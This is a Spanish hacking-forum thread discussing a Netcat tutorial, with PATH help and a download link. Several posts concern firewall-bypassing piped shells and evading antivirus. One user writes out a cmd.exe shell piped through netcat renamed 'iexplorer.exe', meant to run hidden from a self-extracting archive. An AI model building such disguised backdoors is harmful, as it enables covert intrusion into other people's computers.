|
|
ne0x
|
Sobretodo el de shell pipelada o volteada, lo que pasa es que yo veia necesario explicarlo, es el unico metodo de saltarse el firewall unicamente usando el Netcat...
Ya estan puestas las fotos de Jugando con netcat VI
|
|
|
|
« Última modificación: 02 Abril 2007, 23:19 por ne0x »
|
|
|
|
|
WHK
+-=[Yan]=-+
|
jajajajaja muy bueno grax por el aporte XD
|
|
|
|
« Última modificación: 03 Abril 2007, 00:35 por WHK »
|
|
|
|
|
NewLog
|
Yo tengo una duda.
El código de nc es abierto verdad? En el caso de que lo fuera... No habría modo alguno de que añadiendo código el antivirus no lo detectara?
Quizá es muy avanzado para este hilo pero siempre me lo he preguntado... y con una respuesta de que es posible (sin cambiar todo el nc) me basta!
Gracias!
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
gblaze
|
Tengo un problema con esto " JUGANDO CON NETCAT V1.1 Parte II" este comando no me sale bien mira: ================================== type mensaje.txt|nc -vv -w 3 127.0.0.1 25 ================================== dice que "nc" no es un comando reconocido, aqui esta la imagen:  alguien me puede ayudar?? gracias!
|
|
|
|
|
|
|
|
|
ne0x
|
Si, yo me bajaria el Netcat y lo copiaria en una carpeta que este en el PATH. Que es el PATH ? Pues basicamente una variable que contiene las rutas en la que buscar archivos ejecutables, comandos, etc.. separadas por " ; ". Mi PATH: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\MinGW\bin Mi recomendacion es que lo copies en %SystemDrive%\Windows\System32 Lo puedes bajar desde la pagina de http://www.elhacker.net, en la sección Hacking. Te pongo ya el enlace: http://safariexamples.informit.com/0201719568/Misc/Netcat/NT/nc11nt.zipSaludos !!
|
|
|
|
|
|
|
|
|
|
|
ChizzoColman
|
Hola que tal...saliendome del tema WHK me das tu e-mail a si me ayudas..Tengo varias preguntas
|
|
|
|
|
|
|
|
|
ne0x
|
Ponlas aqui y te ayudaremos todos.
|
|
|
|
|
|
|
|
|
dasdas
|
buenas señoras, haciendo uso del metodo de ne0x estoy intentando crear el ejecutable con el winzip pero ... solo me ejecuta el primer comando, a ver si me explico, al poner: iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25 en "ejecutar despues de extraer", solo me ejecuta el: iexplorer -d 127.0.0.1 21 entonces.... creo recordar que en linux lo que hacia era crear un archivo adjunto donde poner los argumentos que en este caso seria: -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25 e invocarlo asi: iexplorer.exe < archivoadjunto pero no se si es fallo mio o que en la shell de win no se hace asi. alguna idea?
|
|
|
|
|
|
|
|
|
hepy_92
|
GrAcIaS!!!!! weniiiisimo el manual, algo que he buscado desde hace tiempo muy bien explicado y muy completo!!! aver si te animas a hacer uno para poder transferir archivos 
|
|
|
|
|
|
|
|
|
dasdas
|
ah! me olvidado decir que haciendo un .bat no me soluciona, ya que entonces si que funciona el invento pero se abre una ventana de shell con todo el comando.... y como que queda un poco feo =P
|
|
|
|
|
|
|
|
|
|